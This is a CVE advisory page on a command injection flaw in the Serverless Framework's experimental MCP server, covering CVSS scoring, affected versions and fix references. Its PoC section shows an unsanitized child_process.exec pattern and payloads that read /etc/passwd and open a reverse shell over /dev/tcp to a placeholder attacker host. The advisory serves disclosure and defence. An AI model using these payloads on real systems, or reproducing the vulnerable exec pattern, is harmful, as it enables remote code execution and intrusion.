Security Vulnerability Report
CVE-2025-69256 CVSS 7.5 HIGH

CVE-2025-69256

Published: 2025-12-30 19:15:45
Last Modified: 2026-03-23 14:42:34

Description

The Serverless Framework is a framework for using AWS Lambda and other managed cloud services to build applications. Starting in version 4.29.0 and prior to version 4.29.3, a command injection vulnerability exists in the Serverless Framework's built-in MCP server package (@serverless/mcp). This vulnerability only affects users of the experimental MCP server feature (serverless mcp), which represents less than 0.1% of Serverless Framework users. The core Serverless Framework CLI and deployment functionality are not affected. The vulnerability is caused by the unsanitized use of input parameters within a call to `child_process.exec`, enabling an attacker to inject arbitrary system commands. Successful exploitation can lead to remote code execution under the server process's privileges. The server constructs and executes shell commands using unvalidated user input directly within command-line strings. This introduces the possibility of shell metacharacter injection (`|`, `>`, `&&`, etc.). Version 4.29.3 fixes the issue.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
Exploitability Score
1.6
Impact Score
5.9
Weakness
CWE-77 (Improper Neutralization of Special Elements used in a Command)

Configurations (Affected Products)

cpe:2.3:a:serverless:serverless:*:*:*:*:*:*:*:* - VULNERABLE
Serverless Framework >= 4.29.0 and < 4.29.3
@serverless/mcp < 4.29.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-69256 PoC - Command Injection in @serverless/mcp
// This PoC demonstrates how shell metacharacters can be injected
const { exec } = require('child_process');

// Vulnerable code pattern (simplified from list-projects.js)
function vulnerableFunction(userInput) {
  // Direct injection into shell command without sanitization
  const command = `some-command ${userInput}`;
  exec(command, (error, stdout, stderr) => {
    console.log(stdout);
  });
}

// PoC payloads:
// 1. Basic command injection:
//    userInput = 'test; cat /etc/passwd'
// 2. Using pipe operator:
//    userInput = 'test | whoami'
// 3. Using AND operator:
//    userInput = 'test && id'
// 4. Reverse shell attempt:
//    userInput = 'test; bash -i >& /dev/tcp/attacker/port 0>&1'

// Example exploitation:
vulnerableFunction('test; cat /etc/passwd');

References

Affected source (packages/mcp/src/tools/list-projects.js, line 68, pre-fix commit 6213453): https://github.com/serverless/serverless/blob/6213453da7df375aaf12fb3522ab8870488fc59a/packages/mcp/src/tools/list-projects.js#L68
Fix commit: https://github.com/serverless/serverless/commit/681ca039550c7169369f98780c6301a00f2dc4c4
Release notes (sf-core@4.29.3): https://github.com/serverless/serverless/releases/tag/sf-core%404.29.3
Vendor advisory GHSA-rwc2-f344-q6w6 (exploit, mitigation): https://github.com/serverless/serverless/security/advisories/GHSA-rwc2-f344-q6w6